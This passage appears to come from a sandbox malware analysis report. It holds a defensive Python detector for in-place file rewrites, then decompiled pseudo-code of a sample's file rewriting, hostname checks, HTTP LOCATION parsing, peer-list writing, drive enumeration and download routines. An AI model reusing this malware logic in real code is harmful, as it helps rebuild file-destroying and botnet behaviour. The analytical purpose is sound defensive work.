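            if access & GENERIC_READ and not access & GENERIC_WRITE and disposition == OPEN_EXISTING:
                stage[path] = max(stage[path], 1)
            elif access & GENERIC_WRITE and disposition == CREATE_ALWAYS and stage[path] == 3:
                stage[path] = 4
            else:
                stage[path] = 0              # any other open breaks the pattern
        elif api == "CreateFileMappingW":
            mapping_file[ret] = a["file"]
        elif api == "MapViewOfFile":
            path = handle_path.get(mapping_file.get(a["mapping"]))
            if path is not None and stage[path] == 1:
                stage[path] = 2
        elif api == "CloseHandle":
            path = handle_path.pop(a["handle"], None)   # handle values are reused after close
            handle_access.pop(a["handle"], None)
            mapping_file.pop(a["handle"], None)
            if path is not None and stage[path] == 2:
                stage[path] = 3
        elif api == "WriteFile":
            path = handle_path.get(a["handle"])
            if path is not None and stage[path] == 4:
                hits.append((path, int(a["bytes"], 0)))
                stage[path] = 0
    return hits


# Constructed trace (not taken from the report): one file processed the way E0040D580
# does it, one open that fails, one file only read and mapped, one file merely created.
SAMPLE_TRACE = r'''
CreateFileW(path="C:\Users\user\Documents\report.dat", access=0x80000000, disposition=3) = 0x1c
CreateFileMappingW(file=0x1c, protect=0x2) = 0x20
MapViewOfFile(mapping=0x20, access=0x4) = 0x2a0000
GetFileSize(handle=0x1c) = 0x1234
UnmapViewOfFile(base=0x2a0000) = 1
CloseHandle(handle=0x20) = 1
CloseHandle(handle=0x1c) = 1
CreateFileW(path="C:\Users\user\Documents\report.dat", access=0x40000000, disposition=2) = 0x1c
WriteFile(handle=0x1c, bytes=0x1134) = 1
CloseHandle(handle=0x1c) = 1
CreateFileW(path="C:\Users\user\Documents\locked.dat", access=0x80000000, disposition=3) = 0xffffffff
CreateFileW(path="C:\Users\user\Documents\readme.txt", access=0x80000000, disposition=3) = 0x24
CreateFileMappingW(file=0x24, protect=0x2) = 0x28
MapViewOfFile(mapping=0x28, access=0x4) = 0x2b0000
UnmapViewOfFile(base=0x2b0000) = 1
CloseHandle(handle=0x28) = 1
CloseHandle(handle=0x24) = 1
CreateFileW(path="C:\Users\user\Documents\new.log", access=0x40000000, disposition=2) = 0x30
WriteFile(handle=0x30, bytes=0x40) = 1
CloseHandle(handle=0x30) = 1
'''.strip().splitlines()

if __name__ == "__main__":
    for path, written in find_inplace_rewrites(SAMPLE_TRACE):
        print(f"in-place rewrite: {path} ({written} bytes written)")
```

Only report.dat is reported: it is the one path that was read through a mapping, closed, and then truncated and rewritten. The bytes written (0x1134) are 0x100 less than the GetFileSize result, which is the length relation the decompiled check `_v20[6] == _v12 - 0x100` enforces. Plain reads and plain file creation do not match, so the rule keys on the pairing rather than on any single API.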

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D6B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D6C3
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D6CD
                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D6EC
                                                                                  • WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040D711
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D71B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                  • String ID:
                                                                                  • API String ID: 171974401-0
                                                                                  • Opcode ID: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction ID: abd0401628c18b29deb1849a45b8fcca8b7b44c39020343394329d6e44a62b50
                                                                                  • Opcode Fuzzy Hash: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction Fuzzy Hash: 06514DB5E00208FBDB14DFE4CC49BEEB775AB48704F108569E615772C0D7B96A84CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks of E00409D70 (node id, address range, API or internal call made in the block, successor nodes):
• 342 409d70-409d87 call 409ab0 → 345, 346
• 345 409d89 → 347
• 346 409d8e-409daa call 409820 strstr → 350, 351
• 350 409dac-409dc8 call 409820 strstr → 360, 361
• 361 409dca-409de6 call 409820 strstr → 351, 360
• 360 409de8 → 347
• 351 409ded-409e03 EnterCriticalSection → 353
• 353 409e0e-409e17 → 354, 355
• 355 409e19-409e29 → 357, 358
• 358 409e2b-409e44 call 40c210 → 354
• 357 409e46 → 353
• 354 409e48-409e53 call 409cc0 → 367, 368
• 368 409e59-409e67 → 370, 371
• 370 409e69 → 371
• 371 409e6d-409e6f call 408e40 → 373
• 373 409e74-409e7e → 367, 374
• 374 409e84-409ea1 call 40c210 → 377, 378
• 377 409ea3-409eb2 → 379, 380
• 379 409eb4-409ebc Sleep → 377
• 380 409ebe-409ef6 call 408fb0 → 381
• 378 409ef8-409f11 → 381
• 381 409f17-409f22 call 409cc0 → 367, 386
• 386 409f24 call 4099a0 → 367
• 367 409f29-409f2e LeaveCriticalSection → 347
• 347 409f34-409f37 (return)
                                                                                  C-Code - Quality: 100%
                                                                                  			E00409D70(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                  				signed char _v5;
                                                                                  				signed int _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				signed char _t47;
                                                                                  				char* _t49;
                                                                                  				char* _t52;
                                                                                  				signed int _t56;
                                                                                  				void* _t60;
                                                                                  				char* _t63;
                                                                                  				signed int _t68;
                                                                                  				char* _t69;
                                                                                  				signed int _t71;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				char* _t85;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t90;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t47 = E00409AB0(_a4); // executed
                                                                                  				_t88 = _t87 + 4;
                                                                                  				_t65 = _t47 & 0x000000ff;
                                                                                  				if((_t47 & 0x000000ff) == 0) {
                                                                                  					_t49 = strstr(E00409820(_t65, _a4), "127.");
                                                                                  					_t90 = _t88 + 0xc;
                                                                                  					__eflags = _t49;
                                                                                  					if(_t49 == 0) {
                                                                                  						L6:
                                                                                  						EnterCriticalSection(0x414e4c);
                                                                                  						_v5 = 0;
                                                                                  						_v12 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v12 -  *0x414e84; // 0x200
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t83 =  *((intOrPtr*)(0x414e88 + _v12 * 4));
                                                                                  							__eflags =  *((intOrPtr*)(_t83 + 4)) - _a4;
                                                                                  							if( *((intOrPtr*)(_t83 + 4)) != _a4) {
                                                                                  								_t85 = _v12 + 1;
                                                                                  								__eflags = _t85;
                                                                                  								_v12 = _t85;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t60 = E0040C210();
                                                                                  							_t50 = _t60 - _a8;
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v12 * 4)) + 8)) = _t60 - _a8;
                                                                                  							_v5 = 1;
                                                                                  							break;
                                                                                  						}
                                                                                  						E00409CC0(_t50);
                                                                                  						_t52 = _v5 & 0x000000ff;
                                                                                  						__eflags = _t52;
                                                                                  						if(_t52 != 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(0x414e4c);
                                                                                  							return _t52;
                                                                                  						}
                                                                                  						_v13 = 0;
                                                                                  						__eflags =  *0x414e84 - 0x200;
                                                                                  						if( *0x414e84 == 0x200) {
                                                                                  							_v13 = 1;
                                                                                  						}
                                                                                  						_t52 = E00408E40(0xc); // executed
                                                                                  						_v20 = _t52;
                                                                                  						__eflags = _v20;
                                                                                  						if(_v20 == 0) {
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                  							 *((intOrPtr*)(_v20 + 8)) = E0040C210() - _a8;
                                                                                  							__eflags = _v13 & 0x000000ff;
                                                                                  							if((_v13 & 0x000000ff) == 0) {
                                                                                  								_t79 =  *0x414e84; // 0x200
                                                                                  								_t55 = _v20;
                                                                                  								 *((intOrPtr*)(0x414e88 + _t79 * 4)) = _v20;
                                                                                  								_t68 =  *0x414e84; // 0x200
                                                                                  								_t69 = _t68 + 1;
                                                                                  								__eflags = _t69;
                                                                                  								 *0x414e84 = _t69;
                                                                                  								L21:
                                                                                  								_t52 = E00409CC0(_t55);
                                                                                  								__eflags = _a12 & 0x000000ff;
                                                                                  								if((_a12 & 0x000000ff) != 0) {
                                                                                  									_t52 = E004099A0(_t52);
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L17:
                                                                                  								_t56 =  *0x414e84; // 0x200
                                                                                  								__eflags =  *(0x414e84[_t56]);
                                                                                  								if( *(0x414e84[_t56]) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								Sleep(1);
                                                                                  							}
                                                                                  							_t81 =  *0x414e84; // 0x200
                                                                                  							 *(0x414e84[_t81]) = 1;
                                                                                  							_t71 =  *0x414e84; // 0x200
                                                                                  							E00408FB0(0x414e84[_t71]);
                                                                                  							_t55 =  *0x414e84; // 0x200
                                                                                  							0x414e84[_t55] = _v20;
                                                                                  							goto L21;
                                                                                  						}
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_t65, _a4), ".127");
                                                                                  					_t94 = _t90 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 == 0) {
                                                                                  						L5:
                                                                                  						return _t63;
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_a4, _a4), ".127.");
                                                                                  					_t90 = _t94 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}

                                                                                  0x00409d7a
                                                                                  0x00409d7f
                                                                                  0x00409d82
                                                                                  0x00409d87
                                                                                  0x00409da0
                                                                                  0x00409da5
                                                                                  0x00409da8
                                                                                  0x00409daa
                                                                                  0x00409ded
                                                                                  0x00409df2
                                                                                  0x00409df8
                                                                                  0x00409dfc
                                                                                  0x00409e0e
                                                                                  0x00409e11
                                                                                  0x00409e17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409e1c
                                                                                  0x00409e26
                                                                                  0x00409e29
                                                                                  0x00409e08
                                                                                  0x00409e08
                                                                                  0x00409e0b
                                                                                  0x00000000
                                                                                  0x00409e0b
                                                                                  0x00409e2b
                                                                                  0x00409e30
                                                                                  0x00409e3d
                                                                                  0x00409e40
                                                                                  0x00000000
                                                                                  0x00409e40
                                                                                  0x00409e48
                                                                                  0x00409e4d
                                                                                  0x00409e51
                                                                                  0x00409e53
                                                                                  0x00409f29
                                                                                  0x00409f2e
                                                                                  0x00000000
                                                                                  0x00409f2e
                                                                                  0x00409e59
                                                                                  0x00409e5d
                                                                                  0x00409e67
                                                                                  0x00409e69
                                                                                  0x00409e69
                                                                                  0x00409e6f
                                                                                  0x00409e77
                                                                                  0x00409e7a
                                                                                  0x00409e7e
                                                                                  0x00000000
                                                                                  0x00409e84
                                                                                  0x00409e8a
                                                                                  0x00409e98
                                                                                  0x00409e9f
                                                                                  0x00409ea1
                                                                                  0x00409ef8
                                                                                  0x00409efe
                                                                                  0x00409f01
                                                                                  0x00409f08
                                                                                  0x00409f0e
                                                                                  0x00409f0e
                                                                                  0x00409f11
                                                                                  0x00409f17
                                                                                  0x00409f17
                                                                                  0x00409f20
                                                                                  0x00409f22
                                                                                  0x00409f24
                                                                                  0x00409f24
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409eaf
                                                                                  0x00409eb2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409eb6
                                                                                  0x00409eb6
                                                                                  0x00409ebe
                                                                                  0x00409ecb
                                                                                  0x00409ed1
                                                                                  0x00409edf
                                                                                  0x00409ee7
                                                                                  0x00409eef
                                                                                  0x00000000
                                                                                  0x00409eef
                                                                                  0x00409e7e
                                                                                  0x00409dbe
                                                                                  0x00409dc3
                                                                                  0x00409dc6
                                                                                  0x00409dc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ddc
                                                                                  0x00409de1
                                                                                  0x00409de4
                                                                                  0x00409de6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409de6
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 00409AB0: gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                    • Part of subcall function 00409AB0: gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  • strstr.NTDLL ref: 00409DA0
                                                                                  • strstr.NTDLL ref: 00409DBE
                                                                                  • strstr.NTDLL ref: 00409DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                  • String ID: .127$.127.$127.
                                                                                  • API String ID: 2540993189-1573993753
                                                                                  • Opcode ID: f74cba095147121a9befcda7353e9145c5ad7863fe778667554f7ed7036415d4
                                                                                  • Instruction ID: 183aa7514d5840da55b51ccb33f3d2103a3eb28b4696c2bac9d1f078e1a22ee6
                                                                                  • Opcode Fuzzy Hash: f74cba095147121a9befcda7353e9145c5ad7863fe778667554f7ed7036415d4
                                                                                  • Instruction Fuzzy Hash: F45190B4944306DBCB04EF64E8417AA7BB5BB84304F14803EE805A73D2E779ED80CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 388 40c840-40c85a 389 40c86b-40c872 388->389 390 40c924-40c92d 389->390 391 40c878-40c897 recvfrom 389->391 392 40c8a6-40c8c3 StrCmpNIA 391->392 393 40c899-40c8a4 Sleep 391->393 395 40c8c5-40c8e4 StrStrIA 392->395 396 40c91f 392->396 394 40c85c-40c865 393->394 394->389 395->396 397 40c8e6-40c91d StrChrA call 40b640 395->397 396->394 397->396
                                                                                  C-Code - Quality: 79%
                                                                                  			E0040C840(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                  				char _v1028;
                                                                                  				char _v1029;
                                                                                  				intOrPtr _v1036;
                                                                                  				char* _v1040;
                                                                                  				char* _v1044;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				_t20 = __eax;
                                                                                  				_v1029 = 0;
                                                                                  				_v1036 = 0;
                                                                                  				while(_v1036 < 2) {
                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0); // executed
                                                                                  					if(_t20 != 0xffffffff) {
                                                                                  						_v1029 = 1;
                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                  							if(_v1040 != 0) {
                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                  								_t29 = E0040B640(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                  								_t37 = _t37 + 8;
                                                                                  								 *_a8 = _t29;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						Sleep(0x3e8); // executed
                                                                                  					}
                                                                                  					_t20 = _v1036 + 1;
                                                                                  					_v1036 = _t20;
                                                                                  				}
                                                                                  				return _v1029;
                                                                                  			}

                                                                                  0x0040c840
                                                                                  0x0040c849
                                                                                  0x0040c850
                                                                                  0x0040c86b
                                                                                  0x0040c88e
                                                                                  0x0040c897
                                                                                  0x0040c8a6
                                                                                  0x0040c8c3
                                                                                  0x0040c8d7
                                                                                  0x0040c8e4
                                                                                  0x0040c8ef
                                                                                  0x0040c912
                                                                                  0x0040c917
                                                                                  0x0040c91d
                                                                                  0x0040c91d
                                                                                  0x0040c8e4
                                                                                  0x0040c899
                                                                                  0x0040c89e
                                                                                  0x0040c89e
                                                                                  0x0040c862
                                                                                  0x0040c865
                                                                                  0x0040c865
                                                                                  0x0040c92d

                                                                                  APIs
                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040C89E
                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleeprecvfrom
                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                  • API String ID: 668330359-3973262388
                                                                                  • Opcode ID: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction ID: 9b34ca997a713d65cf6cd99f526d658ac5dfd41d516b48eadd98018a806326ed
                                                                                  • Opcode Fuzzy Hash: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction Fuzzy Hash: 98216FF1940218EBDB20DB64DC89BE97774AB04308F1486E9E709B72C0D7B95AC68F5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 400 4099a0-4099ad 401 4099b4-4099d2 call 408e60 400->401 402 4099af 400->402 403 409a8c-409a8f 401->403 406 4099d8-4099df 401->406 402->403 407 4099ea-4099f3 406->407 408 409a24-409a45 CreateFileW 407->408 409 4099f5-409a22 407->409 411 409a73-409a89 InterlockedExchange call 408fb0 408->411 412 409a47-409a6d WriteFile FlushFileBuffers CloseHandle 408->412 409->407 411->403 412->411
                                                                                  C-Code - Quality: 100%
                                                                                  			E004099A0(void* __eax) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				long _v24;
                                                                                  				signed int _t36;
                                                                                  				void* _t38;
                                                                                  				void* _t40;
                                                                                  				signed int _t65;
                                                                                  
                                                                                  				if( *0x414e84 == 0) {
                                                                                  					return __eax;
                                                                                  				}
                                                                                  				_t36 =  *0x414e84; // 0x200
                                                                                  				_v12 = _t36 << 3;
                                                                                  				_t38 = E00408E60(_v12);
                                                                                  				_v8 = _t38;
                                                                                  				__eflags = _v8;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v20 = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _v20 -  *0x414e84; // 0x200
                                                                                  						if(__eflags >= 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 4));
                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 8));
                                                                                  						_t65 = _v20 + 1;
                                                                                  						__eflags = _t65;
                                                                                  						_v20 = _t65;
                                                                                  					}
                                                                                  					_t40 = CreateFileW("C:\Users\frontdesk\tnnodes.dat", 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                  					_v16 = _t40;
                                                                                  					__eflags = _v16 - 0xffffffff;
                                                                                  					if(_v16 != 0xffffffff) {
                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0); // executed
                                                                                  						FlushFileBuffers(_v16);
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					InterlockedExchange(0x4133b4, 0x3d);
                                                                                  					return E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _t38;
                                                                                  			}

                                                                                  0x004099ad
                                                                                  0x00000000
                                                                                  Instruction addresses (side column, one per C-code line above): 0x00000000, 0x004099b4, 0x004099bc, 0x004099c3, 0x004099cb, 0x004099ce, 0x004099d2, 0x004099d8, 0x004099ea, 0x004099ed, 0x004099f3, 0x00000000, 0x00000000, 0x00409a08, 0x00409a1e, 0x004099e4, 0x004099e4, 0x004099e7, 0x004099e7, 0x00409a38, 0x00409a3e, 0x00409a41, 0x00409a45, 0x00409a59, 0x00409a63, 0x00409a6d, 0x00409a6d, 0x00409a7a, 0x00000000, 0x00409a89, 0x00409a8f

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tnnodes.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409A38
                                                                                  • WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 00409A59
                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409A63
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A6D
                                                                                  • InterlockedExchange.KERNEL32(004133B4,0000003D), ref: 00409A7A
                                                                                  Strings
                                                                                  • C:\Users\user\tnnodes.dat, xrefs: 00409A33
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                  • String ID: C:\Users\user\tnnodes.dat
                                                                                  • API String ID: 442028454-238434947
                                                                                  • Opcode ID: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction ID: 85340a07573b5f562dbc2fb3f1b8785e1f65b23dd5aeba6ef7127c009f103e88
                                                                                  • Opcode Fuzzy Hash: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction Fuzzy Hash: A6317AB8A00209EBCB14CF94ED45FAEB3B5FB88300F208169E511A7391D774AE41CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 415 4048c0-4048eb GetLogicalDrives 416 4048f6-4048fa 415->416 417 404966-404971 416->417 418 4048fc-40491c RegOpenKeyExW 416->418 419 404964 418->419 420 40491e-404949 RegQueryValueExW 418->420 419->416 421 40495a-40495e RegCloseKey 420->421 422 40494b-40494f 420->422 421->419 422->421 424 404951-404957 422->424 424->421
                                                                                  C-Code - Quality: 100%
                                                                                  			E004048C0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				int _v36;
                                                                                  				long _t26;
                                                                                  				long _t31;
                                                                                  				long _t35;
                                                                                  				void* _t44;
                                                                                  
                                                                                  				_t26 = GetLogicalDrives(); // executed
                                                                                  				_v20 = _t26;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0x80000002;
                                                                                  				_v8 = 0x80000001;
                                                                                  				_v24 = 0;
                                                                                  				while(_v24 < 2) {
                                                                                  					_t31 = RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28); // executed
                                                                                  					if(_t31 == 0) {
                                                                                  						_v32 = 0;
                                                                                  						_v36 = 4;
                                                                                  						_t35 = RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36); // executed
                                                                                  						if(_t35 == 0 && _v32 != 0) {
                                                                                  							_v16 = _v16 | _v32;
                                                                                  						}
                                                                                  						RegCloseKey(_v28);
                                                                                  					}
                                                                                  					_v24 = _v24 + 1;
                                                                                  				}
                                                                                  				return  !_v16 & _v20;
                                                                                  			}
                                                                                  Instruction addresses (side column, one per C-code line above): 0x004048c6, 0x004048cc, 0x004048cf, 0x004048d6, 0x004048dd, 0x004048e4, 0x004048f6, 0x00404914, 0x0040491c, 0x0040491e, 0x00404925, 0x00404941, 0x00404949, 0x00404957, 0x00404957, 0x0040495e, 0x0040495e, 0x004048f3, 0x004048f3, 0x00404971

                                                                                  APIs
                                                                                  • GetLogicalDrives.KERNELBASE ref: 004048C6
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                  • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404907
                                                                                  • NoDrives, xrefs: 00404938
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                  • API String ID: 2666887985-3471754645
                                                                                  • Opcode ID: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction ID: 2b22d0c5c2d49d9c8cdb046828b539e9dc82b3d10e46f6989da5e31515f8ca9d
                                                                                  • Opcode Fuzzy Hash: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction Fuzzy Hash: 8411FCB5E4020A9BDF10DFD0D945BEFBBB4BB48704F108129E611B7280D7B85A45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D7F0(char* _a4, intOrPtr* _a8) {
                                                                                  				void* _v8;
                                                                                  				char _v9;
                                                                                  				void* _v16;
                                                                                  				void _v20;
                                                                                  				long _v24;
                                                                                  				void* _t21;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_v9 = 0;
                                                                                  				_t21 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 1, 0, 0, 0); // executed
                                                                                  				_v16 = _t21;
                                                                                  				if(_v16 != 0) {
                                                                                  					_t24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0); // executed
                                                                                  					_v8 = _t24;
                                                                                  					if(_v8 != 0) {
                                                                                  						_v24 = 4;
